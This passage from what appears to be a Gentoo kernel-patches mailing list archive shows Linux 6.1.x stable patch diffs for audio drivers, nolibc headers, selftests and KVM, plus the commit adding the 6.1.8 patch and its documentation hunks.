+-			  MICFIL_OUTGAIN_CHX_SHIFT(3), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(3), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH4 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(4), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(4), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH5 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(5), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(5), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH6 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(6), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(6), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH7 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(7), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(7), 0x8, 0xF, gain_tlv),
+ 	SOC_ENUM_EXT("MICFIL Quality Select",
+ 		     fsl_micfil_quality_enum,
+ 		     micfil_quality_get, micfil_quality_set),
+diff --git a/sound/soc/fsl/fsl_ssi.c b/sound/soc/fsl/fsl_ssi.c
+index c9e0e31d5b34d..46a53551b955c 100644
+--- a/sound/soc/fsl/fsl_ssi.c
++++ b/sound/soc/fsl/fsl_ssi.c
+@@ -1189,14 +1189,14 @@ static struct snd_soc_dai_driver fsl_ssi_ac97_dai = {
+ 	.symmetric_channels = 1,
+ 	.probe = fsl_ssi_dai_probe,
+ 	.playback = {
+-		.stream_name = "AC97 Playback",
++		.stream_name = "CPU AC97 Playback",
+ 		.channels_min = 2,
+ 		.channels_max = 2,
+ 		.rates = SNDRV_PCM_RATE_8000_48000,
+ 		.formats = SNDRV_PCM_FMTBIT_S16 | SNDRV_PCM_FMTBIT_S20,
+ 	},
+ 	.capture = {
+-		.stream_name = "AC97 Capture",
++		.stream_name = "CPU AC97 Capture",
+ 		.channels_min = 2,
+ 		.channels_max = 2,
+ 		.rates = SNDRV_PCM_RATE_48000,
+diff --git a/sound/soc/mediatek/Kconfig b/sound/soc/mediatek/Kconfig
+index 363fa4d476800..b027fba8233df 100644
+--- a/sound/soc/mediatek/Kconfig
++++ b/sound/soc/mediatek/Kconfig
+@@ -182,10 +182,12 @@ config SND_SOC_MT8186_MT6366_DA7219_MAX98357
+ 	  If unsure select "N".
+ 
+ config SND_SOC_MT8186_MT6366_RT1019_RT5682S
+-	tristate "ASoC Audio driver for MT8186 with RT1019 RT5682S codec"
++	tristate "ASoC Audio driver for MT8186 with RT1019 RT5682S MAX98357A/MAX98360 codec"
+ 	depends on I2C && GPIOLIB
+ 	depends on SND_SOC_MT8186 && MTK_PMIC_WRAP
++	select SND_SOC_MAX98357A
+ 	select SND_SOC_MT6358
++	select SND_SOC_MAX98357A
+ 	select SND_SOC_RT1015P
+ 	select SND_SOC_RT5682S
+ 	select SND_SOC_BT_SCO
+diff --git a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+index 60fa55d0c91f0..6babadb2e6fe2 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
++++ b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+@@ -991,6 +991,21 @@ static struct snd_soc_card mt8186_mt6366_rt1019_rt5682s_soc_card = {
+ 	.num_configs = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_codec_conf),
+ };
+ 
++static struct snd_soc_card mt8186_mt6366_rt5682s_max98360_soc_card = {
++	.name = "mt8186_rt5682s_max98360",
++	.owner = THIS_MODULE,
++	.dai_link = mt8186_mt6366_rt1019_rt5682s_dai_links,
++	.num_links = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_dai_links),
++	.controls = mt8186_mt6366_rt1019_rt5682s_controls,
++	.num_controls = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_controls),
++	.dapm_widgets = mt8186_mt6366_rt1019_rt5682s_widgets,
++	.num_dapm_widgets = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_widgets),
++	.dapm_routes = mt8186_mt6366_rt1019_rt5682s_routes,
++	.num_dapm_routes = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_routes),
++	.codec_conf = mt8186_mt6366_rt1019_rt5682s_codec_conf,
++	.num_configs = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_codec_conf),
++};
++
+ static int mt8186_mt6366_rt1019_rt5682s_dev_probe(struct platform_device *pdev)
+ {
+ 	struct snd_soc_card *card;
+@@ -1132,9 +1147,14 @@ err_adsp_node:
+ 
+ #if IS_ENABLED(CONFIG_OF)
+ static const struct of_device_id mt8186_mt6366_rt1019_rt5682s_dt_match[] = {
+-	{	.compatible = "mediatek,mt8186-mt6366-rt1019-rt5682s-sound",
++	{
++		.compatible = "mediatek,mt8186-mt6366-rt1019-rt5682s-sound",
+ 		.data = &mt8186_mt6366_rt1019_rt5682s_soc_card,
+ 	},
++	{
++		.compatible = "mediatek,mt8186-mt6366-rt5682s-max98360-sound",
++		.data = &mt8186_mt6366_rt5682s_max98360_soc_card,
++	},
+ 	{}
+ };
+ #endif
+diff --git a/sound/soc/sof/debug.c b/sound/soc/sof/debug.c
+index d9a3ce7b69e16..ade0507328af4 100644
+--- a/sound/soc/sof/debug.c
++++ b/sound/soc/sof/debug.c
+@@ -353,7 +353,9 @@ int snd_sof_dbg_init(struct snd_sof_dev *sdev)
+ 			return err;
+ 	}
+ 
+-	return 0;
++	return snd_sof_debugfs_buf_item(sdev, &sdev->fw_state,
++					sizeof(sdev->fw_state),
++					"fw_state", 0444);
+ }
+ EXPORT_SYMBOL_GPL(snd_sof_dbg_init);
+ 
+diff --git a/sound/soc/sof/pm.c b/sound/soc/sof/pm.c
+index df740be645e84..8722bbd7fd3d7 100644
+--- a/sound/soc/sof/pm.c
++++ b/sound/soc/sof/pm.c
+@@ -182,7 +182,7 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	const struct sof_ipc_pm_ops *pm_ops = sdev->ipc->ops->pm;
+ 	const struct sof_ipc_tplg_ops *tplg_ops = sdev->ipc->ops->tplg;
+ 	pm_message_t pm_state;
+-	u32 target_state = 0;
++	u32 target_state = snd_sof_dsp_power_target(sdev);
+ 	int ret;
+ 
+ 	/* do nothing if dsp suspend callback is not set */
+@@ -192,6 +192,9 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	if (runtime_suspend && !sof_ops(sdev)->runtime_suspend)
+ 		return 0;
+ 
++	if (tplg_ops && tplg_ops->tear_down_all_pipelines)
++		tplg_ops->tear_down_all_pipelines(sdev, false);
++
+ 	if (sdev->fw_state != SOF_FW_BOOT_COMPLETE)
+ 		goto suspend;
+ 
+@@ -206,7 +209,6 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 		}
+ 	}
+ 
+-	target_state = snd_sof_dsp_power_target(sdev);
+ 	pm_state.event = target_state;
+ 
+ 	/* Skip to platform-specific suspend if DSP is entering D0 */
+@@ -217,9 +219,6 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 		goto suspend;
+ 	}
+ 
+-	if (tplg_ops->tear_down_all_pipelines)
+-		tplg_ops->tear_down_all_pipelines(sdev, false);
+-
+ 	/* suspend DMA trace */
+ 	sof_fw_trace_suspend(sdev, pm_state);
+ 
+diff --git a/tools/gpio/gpio-event-mon.c b/tools/gpio/gpio-event-mon.c
+index 6c122952c5892..5dee2b98ab604 100644
+--- a/tools/gpio/gpio-event-mon.c
++++ b/tools/gpio/gpio-event-mon.c
+@@ -86,6 +86,7 @@ int monitor_device(const char *device_name,
+ 			gpiotools_test_bit(values.bits, i));
+ 	}
+ 
++	i = 0;
+ 	while (1) {
+ 		struct gpio_v2_line_event event;
+ 
+diff --git a/tools/include/nolibc/ctype.h b/tools/include/nolibc/ctype.h
+index e3000b2992d7b..6f90706d06442 100644
+--- a/tools/include/nolibc/ctype.h
++++ b/tools/include/nolibc/ctype.h
+@@ -96,4 +96,7 @@ int ispunct(int c)
+ 	return isgraph(c) && !isalnum(c);
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_CTYPE_H */
+diff --git a/tools/include/nolibc/errno.h b/tools/include/nolibc/errno.h
+index 06893d6dfb7a6..9dc4919c769b7 100644
+--- a/tools/include/nolibc/errno.h
++++ b/tools/include/nolibc/errno.h
+@@ -24,4 +24,7 @@ static int errno;
+  */
+ #define MAX_ERRNO 4095
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_ERRNO_H */
+diff --git a/tools/include/nolibc/signal.h b/tools/include/nolibc/signal.h
+index ef47e71e2be37..137552216e469 100644
+--- a/tools/include/nolibc/signal.h
++++ b/tools/include/nolibc/signal.h
+@@ -19,4 +19,7 @@ int raise(int signal)
+ 	return sys_kill(sys_getpid(), signal);
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_SIGNAL_H */
+diff --git a/tools/include/nolibc/stdio.h b/tools/include/nolibc/stdio.h
+index a3cebc4bc3ac4..96ac8afc5aeed 100644
+--- a/tools/include/nolibc/stdio.h
++++ b/tools/include/nolibc/stdio.h
+@@ -303,4 +303,7 @@ void perror(const char *msg)
+ 	fprintf(stderr, "%s%serrno=%d\n", (msg && *msg) ? msg : "", (msg && *msg) ? ": " : "", errno);
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_STDIO_H */
+diff --git a/tools/include/nolibc/stdlib.h b/tools/include/nolibc/stdlib.h
+index 92378c4b96605..a24000d1e8222 100644
+--- a/tools/include/nolibc/stdlib.h
++++ b/tools/include/nolibc/stdlib.h
+@@ -419,4 +419,7 @@ char *u64toa(uint64_t in)
+ 	return itoa_buffer;
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_STDLIB_H */
+diff --git a/tools/include/nolibc/string.h b/tools/include/nolibc/string.h
+index ad97c0d522b8e..fffdaf6ff4673 100644
+--- a/tools/include/nolibc/string.h
++++ b/tools/include/nolibc/string.h
+@@ -88,8 +88,11 @@ void *memset(void *dst, int b, size_t len)
+ {
+ 	char *p = dst;
+ 
+-	while (len--)
++	while (len--) {
++		/* prevent gcc from recognizing memset() here */
++		asm volatile("");
+ 		*(p++) = b;
++	}
+ 	return dst;
+ }
+ 
+@@ -285,4 +288,7 @@ char *strrchr(const char *s, int c)
+ 	return (char *)ret;
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_STRING_H */
+diff --git a/tools/include/nolibc/sys.h b/tools/include/nolibc/sys.h
+index ce3ee03aa6794..78473d34e27cd 100644
+--- a/tools/include/nolibc/sys.h
++++ b/tools/include/nolibc/sys.h
+@@ -1243,5 +1243,7 @@ ssize_t write(int fd, const void *buf, size_t count)
+ 	return ret;
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
+ 
+ #endif /* _NOLIBC_SYS_H */
+diff --git a/tools/include/nolibc/time.h b/tools/include/nolibc/time.h
+index d18b7661fdd71..84655361b9ad2 100644
+--- a/tools/include/nolibc/time.h
++++ b/tools/include/nolibc/time.h
+@@ -25,4 +25,7 @@ time_t time(time_t *tptr)
+ 	return tv.tv_sec;
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_TIME_H */
+diff --git a/tools/include/nolibc/types.h b/tools/include/nolibc/types.h
+index 959997034e553..fbbc0e68c001b 100644
+--- a/tools/include/nolibc/types.h
++++ b/tools/include/nolibc/types.h
+@@ -26,13 +26,13 @@
+ #define S_IFSOCK       0140000
+ #define S_IFMT         0170000
+ 
+-#define S_ISDIR(mode)  (((mode) & S_IFDIR)  == S_IFDIR)
+-#define S_ISCHR(mode)  (((mode) & S_IFCHR)  == S_IFCHR)
+-#define S_ISBLK(mode)  (((mode) & S_IFBLK)  == S_IFBLK)
+-#define S_ISREG(mode)  (((mode) & S_IFREG)  == S_IFREG)
+-#define S_ISFIFO(mode) (((mode) & S_IFIFO)  == S_IFIFO)
+-#define S_ISLNK(mode)  (((mode) & S_IFLNK)  == S_IFLNK)
+-#define S_ISSOCK(mode) (((mode) & S_IFSOCK) == S_IFSOCK)
++#define S_ISDIR(mode)  (((mode) & S_IFMT) == S_IFDIR)
++#define S_ISCHR(mode)  (((mode) & S_IFMT) == S_IFCHR)
++#define S_ISBLK(mode)  (((mode) & S_IFMT) == S_IFBLK)
++#define S_ISREG(mode)  (((mode) & S_IFMT) == S_IFREG)
++#define S_ISFIFO(mode) (((mode) & S_IFMT) == S_IFIFO)
++#define S_ISLNK(mode)  (((mode) & S_IFMT) == S_IFLNK)
++#define S_ISSOCK(mode) (((mode) & S_IFMT) == S_IFSOCK)
+ 
+ /* dirent types */
+ #define DT_UNKNOWN     0x0
+@@ -89,39 +89,46 @@
+ #define EXIT_SUCCESS 0
+ #define EXIT_FAILURE 1
+ 
++#define FD_SETIDXMASK (8 * sizeof(unsigned long))
++#define FD_SETBITMASK (8 * sizeof(unsigned long)-1)
++
+ /* for select() */
+ typedef struct {
+-	uint32_t fd32[(FD_SETSIZE + 31) / 32];
++	unsigned long fds[(FD_SETSIZE + FD_SETBITMASK) / FD_SETIDXMASK];
+ } fd_set;
+ 
+-#define FD_CLR(fd, set) do {                                            \
+-		fd_set *__set = (set);                                  \
+-		int __fd = (fd);                                        \
+-		if (__fd >= 0)                                          \
+-			__set->fd32[__fd / 32] &= ~(1U << (__fd & 31)); \
++#define FD_CLR(fd, set) do {						\
++		fd_set *__set = (set);					\
++		int __fd = (fd);					\
++		if (__fd >= 0)						\
++			__set->fds[__fd / FD_SETIDXMASK] &=		\
++				~(1UL << (__fd & FD_SETBITMASK));	\
+ 	} while (0)
+ 
+-#define FD_SET(fd, set) do {                                            \
+-		fd_set *__set = (set);                                  \
+-		int __fd = (fd);                                        \
+-		if (__fd >= 0)                                          \
+-			__set->fd32[__fd / 32] |= 1U << (__fd & 31);    \
++#define FD_SET(fd, set) do {						\
++		fd_set *__set = (set);					\
++		int __fd = (fd);					\
++		if (__fd >= 0)						\
++			__set->fds[__fd / FD_SETIDXMASK] |=		\
++				1UL << (__fd & FD_SETBITMASK);		\
+ 	} while (0)
+ 
+-#define FD_ISSET(fd, set) ({                                                  \
+-		fd_set *__set = (set);                                        \
+-		int __fd = (fd);                                              \
+-		int __r = 0;                                                  \
+-		if (__fd >= 0)                                                \
+-			__r = !!(__set->fd32[__fd / 32] & 1U << (__fd & 31)); \
+-		__r;                                                          \
++#define FD_ISSET(fd, set) ({						\
++		fd_set *__set = (set);					\
++		int __fd = (fd);					\
++		int __r = 0;						\
++		if (__fd >= 0)						\
++			__r = !!(__set->fds[__fd / FD_SETIDXMASK] &	\
++				 1UL << (__fd & FD_SETBITMASK));	\
++		__r;							\
+ 	})
+ 
+-#define FD_ZERO(set) do {                                               \
+-		fd_set *__set = (set);                                  \
+-		int __idx;                                              \
+-		for (__idx = 0; __idx < (FD_SETSIZE+31) / 32; __idx ++) \
+-			__set->fd32[__idx] = 0;                         \
++#define FD_ZERO(set) do {						\
++		fd_set *__set = (set);					\
++		int __idx;						\
++		int __size = (FD_SETSIZE+FD_SETBITMASK) / FD_SETIDXMASK;\
++		for (__idx = 0; __idx < __size; __idx++)		\
++			__set->fds[__idx] = 0;				\
+ 	} while (0)
+ 
+ /* for poll() */
+@@ -202,4 +209,7 @@ struct stat {
+ })
+ #endif
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_TYPES_H */
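
The S_ISxxx rework above deserves a worked example: testing (mode & S_IFDIR) == S_IFDIR checks only a subset of the type bits, and since S_IFSOCK (0140000) contains all the bits of S_IFDIR (0040000), the old macro reported sockets as directories. Masking with S_IFMT first compares the whole type field. A small standalone check, with the constants copied from the hunk above:

	/* Demonstrates why file-type tests must mask with S_IFMT first.
	 * Constants are copied from the nolibc hunk above.
	 */
	#include <stdio.h>

	#define S_IFDIR  0040000
	#define S_IFSOCK 0140000
	#define S_IFMT   0170000

	int main(void)
	{
		unsigned int mode = S_IFSOCK;	/* a socket */

		/* old, buggy test: subset-of-bits comparison */
		printf("old S_ISDIR on a socket: %d\n",
		       (mode & S_IFDIR) == S_IFDIR);	/* prints 1: wrong */

		/* new test: compare the whole type field */
		printf("new S_ISDIR on a socket: %d\n",
		       (mode & S_IFMT) == S_IFDIR);	/* prints 0: correct */
		return 0;
	}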
+diff --git a/tools/include/nolibc/unistd.h b/tools/include/nolibc/unistd.h
+index 1c25e20ee3606..1cfcd52106a42 100644
+--- a/tools/include/nolibc/unistd.h
++++ b/tools/include/nolibc/unistd.h
+@@ -51,4 +51,7 @@ int tcsetpgrp(int fd, pid_t pid)
+ 	return ioctl(fd, TIOCSPGRP, &pid);
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_UNISTD_H */
+diff --git a/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c b/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c
+deleted file mode 100644
+index 3add34df57678..0000000000000
+--- a/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c
++++ /dev/null
+@@ -1,9 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-
+-#include <test_progs.h>
+-#include "jeq_infer_not_null_fail.skel.h"
+-
+-void test_jeq_infer_not_null(void)
+-{
+-	RUN_TESTS(jeq_infer_not_null_fail);
+-}
+diff --git a/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c b/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c
+deleted file mode 100644
+index f46965053acb2..0000000000000
+--- a/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c
++++ /dev/null
+@@ -1,42 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-
+-#include "vmlinux.h"
+-#include <bpf/bpf_helpers.h>
+-#include "bpf_misc.h"
+-
+-char _license[] SEC("license") = "GPL";
+-
+-struct {
+-	__uint(type, BPF_MAP_TYPE_HASH);
+-	__uint(max_entries, 1);
+-	__type(key, u64);
+-	__type(value, u64);
+-} m_hash SEC(".maps");
+-
+-SEC("?raw_tp")
+-__failure __msg("R8 invalid mem access 'map_value_or_null")
+-int jeq_infer_not_null_ptr_to_btfid(void *ctx)
+-{
+-	struct bpf_map *map = (struct bpf_map *)&m_hash;
+-	struct bpf_map *inner_map = map->inner_map_meta;
+-	u64 key = 0, ret = 0, *val;
+-
+-	val = bpf_map_lookup_elem(map, &key);
+-	/* Do not mark ptr as non-null if one of them is
+-	 * PTR_TO_BTF_ID (R9), reject because of invalid
+-	 * access to map value (R8).
+-	 *
+-	 * Here, we need to inline those insns to access
+-	 * R8 directly, since compiler may use other reg
+-	 * once it figures out val==inner_map.
+-	 */
+-	asm volatile("r8 = %[val];\n"
+-		     "r9 = %[inner_map];\n"
+-		     "if r8 != r9 goto +1;\n"
+-		     "%[ret] = *(u64 *)(r8 +0);\n"
+-		     : [ret] "+r"(ret)
+-		     : [inner_map] "r"(inner_map), [val] "r"(val)
+-		     : "r8", "r9");
+-
+-	return ret;
+-}
+diff --git a/tools/testing/selftests/net/toeplitz.c b/tools/testing/selftests/net/toeplitz.c
+index 90026a27eac0c..9ba03164d73a6 100644
+--- a/tools/testing/selftests/net/toeplitz.c
++++ b/tools/testing/selftests/net/toeplitz.c
+@@ -215,7 +215,7 @@ static char *recv_frame(const struct ring_state *ring, char *frame)
+ }
+ 
+ /* A single TPACKET_V3 block can hold multiple frames */
+-static void recv_block(struct ring_state *ring)
++static bool recv_block(struct ring_state *ring)
+ {
+ 	struct tpacket_block_desc *block;
+ 	char *frame;
+@@ -223,7 +223,7 @@ static void recv_block(struct ring_state *ring)
+ 
+ 	block = (void *)(ring->mmap + ring->idx * ring_block_sz);
+ 	if (!(block->hdr.bh1.block_status & TP_STATUS_USER))
+-		return;
++		return false;
+ 
+ 	frame = (char *)block;
+ 	frame += block->hdr.bh1.offset_to_first_pkt;
+@@ -235,6 +235,8 @@ static void recv_block(struct ring_state *ring)
+ 
+ 	block->hdr.bh1.block_status = TP_STATUS_KERNEL;
+ 	ring->idx = (ring->idx + 1) % ring_block_nr;
++
++	return true;
+ }
+ 
+ /* simple test: sleep once unconditionally and then process all rings */
+@@ -245,7 +247,7 @@ static void process_rings(void)
+ 	usleep(1000 * cfg_timeout_msec);
+ 
+ 	for (i = 0; i < num_cpus; i++)
+-		recv_block(&rings[i]);
++		do {} while (recv_block(&rings[i]));
+ 
+ 	fprintf(stderr, "count: pass=%u nohash=%u fail=%u\n",
+ 		frames_received - frames_nohash - frames_error,
+@@ -257,12 +259,12 @@ static char *setup_ring(int fd)
+ 	struct tpacket_req3 req3 = {0};
+ 	void *ring;
+ 
+-	req3.tp_retire_blk_tov = cfg_timeout_msec;
++	req3.tp_retire_blk_tov = cfg_timeout_msec / 8;
+ 	req3.tp_feature_req_word = TP_FT_REQ_FILL_RXHASH;
+ 
+ 	req3.tp_frame_size = 2048;
+ 	req3.tp_frame_nr = 1 << 10;
+-	req3.tp_block_nr = 2;
++	req3.tp_block_nr = 16;
+ 
+ 	req3.tp_block_size = req3.tp_frame_size * req3.tp_frame_nr;
+ 	req3.tp_block_size /= req3.tp_block_nr;
+diff --git a/virt/kvm/vfio.c b/virt/kvm/vfio.c
+index 495ceabffe88b..9584eb57e0eda 100644
+--- a/virt/kvm/vfio.c
++++ b/virt/kvm/vfio.c
+@@ -336,7 +336,7 @@ static int kvm_vfio_has_attr(struct kvm_device *dev,
+ 	return -ENXIO;
+ }
+ 
+-static void kvm_vfio_destroy(struct kvm_device *dev)
++static void kvm_vfio_release(struct kvm_device *dev)
+ {
+ 	struct kvm_vfio *kv = dev->private;
+ 	struct kvm_vfio_group *kvg, *tmp;
+@@ -355,7 +355,7 @@ static void kvm_vfio_destroy(struct kvm_device *dev)
+ 	kvm_vfio_update_coherency(dev);
+ 
+ 	kfree(kv);
+-	kfree(dev); /* alloc by kvm_ioctl_create_device, free by .destroy */
++	kfree(dev); /* alloc by kvm_ioctl_create_device, free by .release */
+ }
+ 
+ static int kvm_vfio_create(struct kvm_device *dev, u32 type);
+@@ -363,7 +363,7 @@ static int kvm_vfio_create(struct kvm_device *dev, u32 type);
+ static struct kvm_device_ops kvm_vfio_ops = {
+ 	.name = "kvm-vfio",
+ 	.create = kvm_vfio_create,
+-	.destroy = kvm_vfio_destroy,
++	.release = kvm_vfio_release,
+ 	.set_attr = kvm_vfio_set_attr,
+ 	.has_attr = kvm_vfio_has_attr,
+ };


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-24  7:19 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-01-24  7:19 UTC (permalink / raw
  To: gentoo-commits

commit:     a7e1722d1d75744592599e63e49a84ad72e66cfc
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Tue Jan 24 07:18:40 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Tue Jan 24 07:19:13 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=a7e1722d

Linux patch 6.1.8

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |    4 +
 1007_linux-6.1.8.patch | 6638 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6642 insertions(+)

diff --git a/0000_README b/0000_README
index b3e83a42..396dd2ee 100644
--- a/0000_README
+++ b/0000_README
@@ -71,6 +71,10 @@ Patch:  1006_linux-6.1.7.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.7
 
+Patch:  1007_linux-6.1.8.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.8
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1007_linux-6.1.8.patch b/1007_linux-6.1.8.patch
new file mode 100644
index 00000000..bdd0484e
--- /dev/null
+++ b/1007_linux-6.1.8.patch
@@ -0,0 +1,6638 @@
+diff --git a/Documentation/ABI/testing/sysfs-kernel-oops_count b/Documentation/ABI/testing/sysfs-kernel-oops_count
+new file mode 100644
+index 0000000000000..156cca9dbc960
+--- /dev/null
++++ b/Documentation/ABI/testing/sysfs-kernel-oops_count
+@@ -0,0 +1,6 @@
++What:		/sys/kernel/oops_count
++Date:		November 2022
++KernelVersion:	6.2.0
++Contact:	Linux Kernel Hardening List <linux-hardening@vger.kernel.org>
++Description:
++		Shows how many times the system has Oopsed since last boot.
+diff --git a/Documentation/ABI/testing/sysfs-kernel-warn_count b/Documentation/ABI/testing/sysfs-kernel-warn_count
+new file mode 100644
+index 0000000000000..90a029813717d
+--- /dev/null
++++ b/Documentation/ABI/testing/sysfs-kernel-warn_count
+@@ -0,0 +1,6 @@
++What:		/sys/kernel/warn_count
++Date:		November 2022
++KernelVersion:	6.2.0
++Contact:	Linux Kernel Hardening List <linux-hardening@vger.kernel.org>
++Description:
++		Shows how many times the system has Warned since last boot.
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index c2c64c1b706ff..b3588fff1ec0a 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -667,6 +667,15 @@ This is the default behavior.
+ an oops event is detected.
+ 
+ 
++oops_limit
++==========
++
++Number of kernel oopses after which the kernel should panic when
++``panic_on_oops`` is not set. Setting this to 0 disables checking
++the count. Setting this to 1 has the same effect as setting
++``panic_on_oops=1``. The default value is 10000.
++
++
+ osrelease, ostype & version
+ ===========================
+ 
+@@ -1523,6 +1532,16 @@ entry will default to 2 instead of 0.
+ 2 Unprivileged calls to ``bpf()`` are disabled
+ = =============================================================
+ 
++
++warn_limit
++==========
++
++Number of kernel warnings after which the kernel should panic when
++``panic_on_warn`` is not set. Setting this to 0 disables checking
++the warning count. Setting this to 1 has the same effect as setting
++``panic_on_warn=1``. The default value is 0.
++
++
+ watchdog
+ ========
+ 
+diff --git a/Documentation/devicetree/bindings/phy/amlogic,g12a-usb2-phy.yaml b/Documentation/devicetree/bindings/phy/amlogic,g12a-usb2-phy.yaml
+new file mode 100644
+index 0000000000000..bb01c6b34dabc
+--- /dev/null
++++ b/Documentation/devicetree/bindings/phy/amlogic,g12a-usb2-phy.yaml
+@@ -0,0 +1,78 @@
++# SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
++# Copyright 2019 BayLibre, SAS
++%YAML 1.2
++---
++$id: "http://devicetree.org/schemas/phy/amlogic,g12a-usb2-phy.yaml#"
++$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++
++title: Amlogic G12A USB2 PHY
++
++maintainers:
++  - Neil Armstrong <neil.armstrong@linaro.org>
++
++properties:
++  compatible:
++    enum:
++      - amlogic,g12a-usb2-phy
++      - amlogic,a1-usb2-phy
++
++  reg:
++    maxItems: 1
++
++  clocks:
++    maxItems: 1
++
++  clock-names:
++    items:
++      - const: xtal
++
++  resets:
++    maxItems: 1
++
++  reset-names:
++    items:
++      - const: phy
++
++  "#phy-cells":
++    const: 0
++
++  phy-supply:
++    description:
++      Phandle to a regulator that provides power to the PHY. This
++      regulator will be managed during the PHY power on/off sequence.
++
++required:
++  - compatible
++  - reg
++  - clocks
++  - clock-names
++  - resets
++  - reset-names
++  - "#phy-cells"
++
++if:
++  properties:
++    compatible:
++      enum:
++        - amlogic,meson-a1-usb-ctrl
++
++then:
++  properties:
++    power-domains:
++      maxItems: 1
++  required:
++    - power-domains
++
++additionalProperties: false
++
++examples:
++  - |
++    phy@36000 {
++          compatible = "amlogic,g12a-usb2-phy";
++          reg = <0x36000 0x2000>;
++          clocks = <&xtal>;
++          clock-names = "xtal";
++          resets = <&phy_reset>;
++          reset-names = "phy";
++          #phy-cells = <0>;
++    };
+diff --git a/Documentation/devicetree/bindings/phy/amlogic,g12a-usb3-pcie-phy.yaml b/Documentation/devicetree/bindings/phy/amlogic,g12a-usb3-pcie-phy.yaml
+new file mode 100644
+index 0000000000000..129d26e99776b
+--- /dev/null
++++ b/Documentation/devicetree/bindings/phy/amlogic,g12a-usb3-pcie-phy.yaml
+@@ -0,0 +1,59 @@
++# SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
++# Copyright 2019 BayLibre, SAS
++%YAML 1.2
++---
++$id: "http://devicetree.org/schemas/phy/amlogic,g12a-usb3-pcie-phy.yaml#"
++$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++
++title: Amlogic G12A USB3 + PCIE Combo PHY
++
++maintainers:
++  - Neil Armstrong <neil.armstrong@linaro.org>
++
++properties:
++  compatible:
++    enum:
++      - amlogic,g12a-usb3-pcie-phy
++
++  reg:
++    maxItems: 1
++
++  clocks:
++    maxItems: 1
++
++  clock-names:
++    items:
++      - const: ref_clk
++
++  resets:
++    maxItems: 1
++
++  reset-names:
++    items:
++      - const: phy
++
++  "#phy-cells":
